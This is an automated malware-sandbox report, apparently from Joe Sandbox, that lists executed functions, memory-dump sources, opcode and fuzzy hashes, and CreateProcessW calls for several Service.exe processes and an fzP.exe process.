Instruction ID: 087a14228c6aceb96064b82eb8903dd44336982966cfe4d61b41ab3e9f375e6a
Opcode Fuzzy Hash: 398949954a7bc9f55bb586c1c68ab0990542ee4991d5c4a6ad4934d33d5dc093
Instruction Fuzzy Hash: 2DD05B30A081408BCF155B78A51D3AC3F71DF11219F0441F8DD599F192D6764C3BCB85

Analysis Process: Service.exePID: 2968, Parent PID: 1360COMMON

Executed Functions

Function 00BC0ECB Relevance: 2.8, Strings: 2, Instructions: 290COMMON

Download Yara Rule

Strings

Xaq, xrefs: 00BC0EFF
$]q, xrefs: 00BC0EE6

Memory Dump Source

Source File: 0000000E.00000002.2271987513.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_bc0000_Service.jbxd

Similarity

API ID:
String ID: Xaq$$]q
API String ID: 0-1280934391
Opcode ID: d76f178f6a9868c9086e3bcac9729e00e53b8a9b8102fe51cfb8463a6b908ab0
Instruction ID: b53aad6517c938d6e29f7d1f0caaf24d934c41efd7436451c0bd536919e05649
Opcode Fuzzy Hash: d76f178f6a9868c9086e3bcac9729e00e53b8a9b8102fe51cfb8463a6b908ab0
Instruction Fuzzy Hash: 2FA17134F00218DBDB48EFB89854B6E7BB7FFC8710B19896DD506E7295CE3888069791

Function 00BC0901 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Haq, xrefs: 00BC095D

Memory Dump Source

Source File: 0000000E.00000002.2271987513.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_bc0000_Service.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: a6cd6edd79d3d0c8933461f004dacd128e0451ef94e627f13d151e756381dc7d
Instruction ID: 9d6849a2d7914e0a2d70289457d2cc9027827c3930447a2a96abcbce03797feb
Opcode Fuzzy Hash: a6cd6edd79d3d0c8933461f004dacd128e0451ef94e627f13d151e756381dc7d
Instruction Fuzzy Hash: 46219030E15248CFCB58EBB8891576EBFF2AB84300F1485EDC449D7696DB744E46CB81

Function 00BC1304 Relevance: .5, Instructions: 538COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2271987513.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_bc0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee951d498b350e4f10572e89deb8925fa8b743f4eed9df1b307e9223d6f8812e
Instruction ID: 01c9af9a833139ac989ca3e2fcd729022767e56fa38b2bc035b605e73031370a
Opcode Fuzzy Hash: ee951d498b350e4f10572e89deb8925fa8b743f4eed9df1b307e9223d6f8812e
Instruction Fuzzy Hash: 6631A474904246DFCB02EBB8D845BAD7FB2FF89304F1049E9E005A7256EB705955CB51

Function 00BC0BD8 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2271987513.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_bc0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac1e25e4e49398d4ada721f6c4e7a1d5a9c8edc25d5062e519ea379cd7a0306d
Instruction ID: 6671371eeb4ebf79c698746dba37f36697002e89347fec47e2809d864b065ddf
Opcode Fuzzy Hash: ac1e25e4e49398d4ada721f6c4e7a1d5a9c8edc25d5062e519ea379cd7a0306d
Instruction Fuzzy Hash: AC71B5757006068FCB15EB78D858A6E7BF2FF88300B10896DE40ADB7A5DF709C468B91

Function 00BC0BC8 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2271987513.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_bc0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ca18a63225a3aa7b1348e30dddf54799eb5d91c22b5255581e8791fee029bb7
Instruction ID: e9a93e1082dd153264f942bcb6652eee6fb8bc1c971d4d3cb9ee9d2a6ddbe8c0
Opcode Fuzzy Hash: 9ca18a63225a3aa7b1348e30dddf54799eb5d91c22b5255581e8791fee029bb7
Instruction Fuzzy Hash: E541B6716006028FCB19FB78EC5866E7BE2FB84300310897DE41AC7695EF749C868F91

Function 00BC1771 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2271987513.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_bc0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57fd2908b5f212331e56258e0a2243dd707f97457f288aedc3d073e5c5ae248
Instruction ID: 75b628d52ef018346453392f07382f5f55db6b317323137de34173080a902150
Opcode Fuzzy Hash: e57fd2908b5f212331e56258e0a2243dd707f97457f288aedc3d073e5c5ae248
Instruction Fuzzy Hash: 1121C5B1B002055FCF14AFBD495576EBAE6EFC9300B15486ED14AD7382DE348C0647A1

Function 00BC1660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2271987513.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_bc0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61b9d75e28dd33f6fa21d1933cfb4e15de29fc61a276e126c9e7e851a911d173
Instruction ID: c574554df43bd322655e0e3ef8587db3eb9859fd2a5f98065361a117415f9fe8
Opcode Fuzzy Hash: 61b9d75e28dd33f6fa21d1933cfb4e15de29fc61a276e126c9e7e851a911d173
Instruction Fuzzy Hash: 2E21867490020ADFCB05FFB8D8456AD7BB6FF88304F2049A9E405A7354EB706A95CB51

Function 00BC0CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2271987513.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_bc0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 566a0fa46a40d5ba991fcc6b51f7fcf9011f944cd43bd9a0862126ef18731086
Instruction ID: a4b08ff0b5f6872184e9845ad3e72a46f4c536da33a0b8ed14423dc1b460d6c0
Opcode Fuzzy Hash: 566a0fa46a40d5ba991fcc6b51f7fcf9011f944cd43bd9a0862126ef18731086
Instruction Fuzzy Hash: 8B214D72700B128BCB59EB79D85852E7AE2FF842143108D3DD06A8B690DF34DD4A8B92

Function 00BC07F7 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2271987513.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_bc0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dea1f4e400d2323b2900a624cb246cf87acd301d5ad3f012e9f6f21da1f0649e
Instruction ID: 2c1c9dc837f546f11e537c9fbbb0a481c6a9e898815d1bf9ceeddda52d5652ba
Opcode Fuzzy Hash: dea1f4e400d2323b2900a624cb246cf87acd301d5ad3f012e9f6f21da1f0649e
Instruction Fuzzy Hash: 4421DB755156478FCB03E768EC456543B71EB45300B658EC5E4048B23BF6746D4A8BA1

Function 00BC0838 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2271987513.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_bc0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fba368ff226694f46e9bafa98adc2783c2bf1d8272f5c3fd4f1c030ac770e96
Instruction ID: 46c8f98b65bf6752dbffbb16852d33370a573cfd7f15484203db0c74d4aea340
Opcode Fuzzy Hash: 3fba368ff226694f46e9bafa98adc2783c2bf1d8272f5c3fd4f1c030ac770e96
Instruction Fuzzy Hash: 451107745056479FCB42EF68FD40A557B76F788304B248ED8E4048B23AF6B46D96CF90

Function 00BC0848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2271987513.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_bc0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7fe54174e791768f38566647570d6af285efb30193f812924d99d16143ca49a
Instruction ID: eabb29f8885736fa1cceb815a7e39627264e6cb437d00cf4ec1f38c67c69d204
Opcode Fuzzy Hash: b7fe54174e791768f38566647570d6af285efb30193f812924d99d16143ca49a
Instruction Fuzzy Hash: B6019B74501A079FCB42FF58FD80A5577A6F788304B209E94B4088B229F6B479969F90

Analysis Process: Service.exePID: 5796, Parent PID: 1360COMMON

Executed Functions

Function 017F0901 Relevance: 1.3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

Haq, xrefs: 017F095D

Memory Dump Source

Source File: 0000000F.00000002.2272410183.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_17f0000_Service.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: a2e9b4c7faa8d4907d58a4cd4c75bafa88ee108fa535a84bc69b01781af2cb02
Instruction ID: ac549186c45f0523134487420555b8eb0748d9172ae4de166cba1273853fc71e
Opcode Fuzzy Hash: a2e9b4c7faa8d4907d58a4cd4c75bafa88ee108fa535a84bc69b01781af2cb02
Instruction Fuzzy Hash: 31217130A04209CFCB54DFA8C4587AEBBB2EF84300F1084AED5099B396EB308E55CB81

Function 017F1304 Relevance: .5, Instructions: 498COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2272410183.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_17f0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0b55b75a11880e622327da22f50c991e9411dc69c963b0fce605d3740713e7f
Instruction ID: fa9f5fba883345944bfd5491d9ee99dc68e2fc317956cb536e997d8c3ec82484
Opcode Fuzzy Hash: a0b55b75a11880e622327da22f50c991e9411dc69c963b0fce605d3740713e7f
Instruction Fuzzy Hash: BA319174A0024ADFCB05EFB8E8586ADBFB2FF88304F2045A9E505A7351DB345955CB51

Function 017F0BD8 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2272410183.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_17f0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50f0a1fa3f3ff96e1689d5b0b77e20d1c2cd65bbfa89ca79e03c51215ead3e7d
Instruction ID: b030163fd9f85f8851cfe27d4a7a9a2fc8ea2d930cad75e32817226f87019486
Opcode Fuzzy Hash: 50f0a1fa3f3ff96e1689d5b0b77e20d1c2cd65bbfa89ca79e03c51215ead3e7d
Instruction Fuzzy Hash: C77193717002068FCB15EF79E85866E7BA3FF88311B20496DE506DB7A5DF749C058B81

Function 017F0BC8 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2272410183.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_17f0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 808295e3052111444d6c86f07ce578929c35e4b5ce98e19b84975c1f03cc13b3
Instruction ID: 597058a9074f288f24c656818bde7f3f64e40a8e0747901cb33b69d1054915c4
Opcode Fuzzy Hash: 808295e3052111444d6c86f07ce578929c35e4b5ce98e19b84975c1f03cc13b3
Instruction Fuzzy Hash: FA416F717002068FCB19EB79E45C56EBBA3FF88351320492DE5068B795DF34AC158B81

Function 017F1771 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2272410183.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_17f0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcccbef3a555989715b815c85d0aa3fb81ecf0bd7258c3812e15cf1f86419998
Instruction ID: 432c3ea373ba4d2f806f5ce2ad773981f5af9271be0e5b9eda77fef035b868e8
Opcode Fuzzy Hash: dcccbef3a555989715b815c85d0aa3fb81ecf0bd7258c3812e15cf1f86419998
Instruction Fuzzy Hash: 71219571B0021A8FCB58AFBD481466EBAEAFFC8350B11443ED54AD7395DF348C0587A1

Function 017F1660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2272410183.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_17f0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d809efcb2654f6ef91616b72b72d042117bbd789bac56e8b13090e2b9e41d168
Instruction ID: 71480963a20a6f8cdee6d73ebfdbfe637c39bb7527fe760a09f7cbc3ef20aedd
Opcode Fuzzy Hash: d809efcb2654f6ef91616b72b72d042117bbd789bac56e8b13090e2b9e41d168
Instruction Fuzzy Hash: ED213074B0020ADFCB05EFB9E8486ADBBB6FFC8304F204569E505A7350DB746A95CB91

Function 017F0CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2272410183.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_17f0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3edfe4d24ea951d35ea2b95711ab8dbf0a96a695694dc2e7f32b04a41ec7d3c6
Instruction ID: 6a83ef63416a282026c4ecab13578173f3aa0c6830b316e39caf07e5687b0b81
Opcode Fuzzy Hash: 3edfe4d24ea951d35ea2b95711ab8dbf0a96a695694dc2e7f32b04a41ec7d3c6
Instruction Fuzzy Hash: 57216F72700B464BCA2AAB7E841852EB6E3FF842543108D2DD16B8B790DF35EC058BD2

Function 017F0838 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2272410183.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_17f0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebe4399b081608a33a281e07defc706b294b2f110eab254cf9065e446cb33c62
Instruction ID: 6faf408cb5b557c6caea1f1dff241a89cbb39a9552bfa058bef6bf6a127a63f1
Opcode Fuzzy Hash: ebe4399b081608a33a281e07defc706b294b2f110eab254cf9065e446cb33c62
Instruction Fuzzy Hash: 19112178700246CFCB41DF2DF9889597BB6FBC4344B205A94F8048B225D67C5D99CF91

Function 017F0848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2272410183.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_17f0000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eb24ee176137393a1da556007263c78b819975a82c5696256c2b52c22baebc4
Instruction ID: 431a9c175febe98123565aeab6a82ebb10673259b3ab2eaebe159f98d38f9bf1
Opcode Fuzzy Hash: 6eb24ee176137393a1da556007263c78b819975a82c5696256c2b52c22baebc4
Instruction Fuzzy Hash: A801C478701106DFCB01DF1DF988A557BBAFBC4384B209A94F8048B215D67C6D998F91

Analysis Process: Service.exePID: 3560, Parent PID: 1360COMMON

Executed Functions

Function 01351304 Relevance: .5, Instructions: 502COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2272391770.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1350000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 389419df9cbe1befa5519c1ec041917fd236f2b0dc3686349bd37d81f181d4dd
Instruction ID: e718121780dc56bf7f564b21660269d3112d152303798cb92714261b0201a4f8
Opcode Fuzzy Hash: 389419df9cbe1befa5519c1ec041917fd236f2b0dc3686349bd37d81f181d4dd
Instruction Fuzzy Hash: 6231C174914246DFCB02EFB4D85479D7FB2BF89300F2489A9E401D7256DB385A40CB51

Function 01350BD8 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2272391770.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1350000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58188ccaba32a73b5fa96e02c70766b7c792253d0741d6baccc13b321d9f6da0
Instruction ID: 921dc371f324f74b7641b71d983b023b7067549a6058fd00ec5a7288e414a611
Opcode Fuzzy Hash: 58188ccaba32a73b5fa96e02c70766b7c792253d0741d6baccc13b321d9f6da0
Instruction Fuzzy Hash: 4171C3747002068FCB19FB78E858A6E7BE3FF88714B108968E406DB7A5DF349D459B81

Function 01350BC8 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2272391770.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1350000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae70caae86406fa820d0e78ea08440fc074856905f17e1cb758c5ff1f559a6fe
Instruction ID: 58428942fb3286424852910e78c9a716c28c95b4de8ef69daabcca99b0c526e1
Opcode Fuzzy Hash: ae70caae86406fa820d0e78ea08440fc074856905f17e1cb758c5ff1f559a6fe
Instruction Fuzzy Hash: BB41C37560034A8FCB59FB79E85866E7BA3FF84314310892CE40ACB6A5DF389D459F81

Function 01351771 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2272391770.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1350000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b8772dda476f4ac114d06c4b96d82186dc24c00bc90bccd29c0a3b5af8de102
Instruction ID: 75c0bd9f429d01beb3ec56e2c07d4d12013bce5ea2c1cbaa77154904301ae2a0
Opcode Fuzzy Hash: 1b8772dda476f4ac114d06c4b96d82186dc24c00bc90bccd29c0a3b5af8de102
Instruction Fuzzy Hash: 0121D4B1F002095FCB58AFBD48543AFBEEAAFC9310B15842DD54AD7381DE38890187A1

Function 01351660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2272391770.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1350000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83752efe987d37f139ff16cba6b506636eefcb4c6e0e6f22ff1bf41a3c97f22f
Instruction ID: 0e420ea8c91a9642d43c03c7c9c38e400b8a3df38398bad0b79b209c7f92280e
Opcode Fuzzy Hash: 83752efe987d37f139ff16cba6b506636eefcb4c6e0e6f22ff1bf41a3c97f22f
Instruction Fuzzy Hash: DD217E7491020ADFCB05FFB8E8447AD7BB6FF88304F208968E405A7355DB746A91CB91

Function 01350CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2272391770.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1350000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a9fefbabb7292b9a090040e36ad19267a5a1c439f8d11d6ea7e66da81b6e808
Instruction ID: 769df74537e067a1e0dae8426853f706cd6c184888126e66062fc3b68493fd67
Opcode Fuzzy Hash: 9a9fefbabb7292b9a090040e36ad19267a5a1c439f8d11d6ea7e66da81b6e808
Instruction Fuzzy Hash: 96219271700B064BCB6DEB39841856E7AE3FF846243104D2DD46A8B690DF35ED095B92

Function 01350838 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2272391770.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1350000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d041174bdfbea9af4e8bb2ff44381d8a13d7a9595711eb3391a518ef70d807c6
Instruction ID: b88c1007eef6a855c5a268a1f9c2d12013e63632e64d0e8db0629f69823cbf68
Opcode Fuzzy Hash: d041174bdfbea9af4e8bb2ff44381d8a13d7a9595711eb3391a518ef70d807c6
Instruction Fuzzy Hash: 671103745252869FCF02FF28F880B553B76F744304724CE64E404CB22AD6786D56DF80

Function 01350848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2272391770.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1350000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e6e5e3bd85a4190787a50549f53bce27c54fd4d6053fde40067e31ef4876aa5
Instruction ID: a5953d252a89efc4590b74289cad26dfb329003dfb62c642a66e677878abea54
Opcode Fuzzy Hash: 0e6e5e3bd85a4190787a50549f53bce27c54fd4d6053fde40067e31ef4876aa5
Instruction Fuzzy Hash: 2C01AD7452124A9FCF02FF18F980B557BAAF744314B24DE64F804CB22AD6786D96DF80

Function 01350901 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2272391770.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1350000_Service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 791a18b515403d074979ae2c83c64af57d7ee7483a4adbc30ce1fe15ad692e3f
Instruction ID: 21ea0f7e47af281d2d846d48edebf63590b821e3f1d15d654e3815addfe5926d
Opcode Fuzzy Hash: 791a18b515403d074979ae2c83c64af57d7ee7483a4adbc30ce1fe15ad692e3f
Instruction Fuzzy Hash: 60D05B31A0D2544FCF165BBC581D79C7F619F45315F0941E8DC09EB1A2D5715C25CB51

Analysis Process: fzP.exePID: 5396, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	32.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	42
Total number of Limit Nodes:	4

Executed Functions

Function 023E5C6C Relevance: 1.7, APIs: 1, Instructions: 226
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 023E5E49

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d794993684e963dd03aa4fcf74d346e9e1c8362103187c861c2b4de4f1422402
Instruction ID: eeafbf3c04181c6613e7c536d6212346ac5359fc2480abcbd72ab9f738f6374f
Opcode Fuzzy Hash: d794993684e963dd03aa4fcf74d346e9e1c8362103187c861c2b4de4f1422402
Instruction Fuzzy Hash: B481C3B4D00229DFDF21DFA9C884BDDBBB5BB09304F1491AAD509B7260DB309A89CF55

Function 023E1B9C Relevance: 1.7, APIs: 1, Instructions: 225
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 023E1D79

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4f69d95e88d59ec140cd9f30b9aaa441839abe15a7a14395d6ff7e630384e40b
Instruction ID: 51a48b5e7cbcba9733bc02efdec5aa97bfaea17d4cc6c4a687e0911a8cf9d7e9
Opcode Fuzzy Hash: 4f69d95e88d59ec140cd9f30b9aaa441839abe15a7a14395d6ff7e630384e40b
Instruction Fuzzy Hash: EC81E4B4D00229CFDF20CF69C980BEDBBB5AB09300F1090AAE549B7250DB709E89CF55

Function 023E6EA4 Relevance: 1.7, APIs: 1, Instructions: 225
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 023E7081

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: adce3ecf81c5a200edd30b58832f8df73384820b5240d589bf2d1583f02305eb
Instruction ID: 24ffe85ae2311a918e4e7b0635e1e5fbeac2c5174f12525a40385a4b8a2b8828
Opcode Fuzzy Hash: adce3ecf81c5a200edd30b58832f8df73384820b5240d589bf2d1583f02305eb
Instruction Fuzzy Hash: 6681C3B4D00269CFDF21CF69C880BDDBBB5AB09304F1491AAE549B7250DB30AA89CF55

Function 023E4E34 Relevance: 1.7, APIs: 1, Instructions: 224
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 023E5011

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 96dec7f9c3f36f0a0e0cc0b3fb79f6ade78bd2d4902871910832ea28ebc04678
Instruction ID: 52ee0e69dc5886c82c1d4d299a9d7c3514f5d68e129f13d9abb4a4217f43b9a0
Opcode Fuzzy Hash: 96dec7f9c3f36f0a0e0cc0b3fb79f6ade78bd2d4902871910832ea28ebc04678
Instruction Fuzzy Hash: F281C2B4D002698FDF21CFA9C840BDDBBF5AB49304F1491AAE509B7250DB70AA89CF55

Function 023E7CDC Relevance: 1.7, APIs: 1, Instructions: 224
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 023E7EB9

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f434fee584cf13c99f21876d236dae6989ca754424d908972dabbddbd6fbcfac
Instruction ID: 605620387592e0ae75847f41b5dd209f7734ce48a369b42640564fc2053b76c6
Opcode Fuzzy Hash: f434fee584cf13c99f21876d236dae6989ca754424d908972dabbddbd6fbcfac
Instruction Fuzzy Hash: DB81C474D00229CFDF21CFA9C880BDDBBF5AB49304F1491AAD509B7250DB30AA89CF55

Function 023E4024 Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 023E7081

Memory Dump Source

Source File: 00000011.00000002.2322348670.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_23e0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f202516efddca2dd8d3da6fadd4142b9325127cef90ed63f7dd68aafb62bf213
Instruction ID: 36456186ca44436a806e64f11672468055bc136f4ad7dcb1e2f7dc6d1a7e635a
Opcode Fuzzy Hash: f202516efddca2dd8d3da6fadd4142b9325127cef90ed63f7dd68aafb62bf213
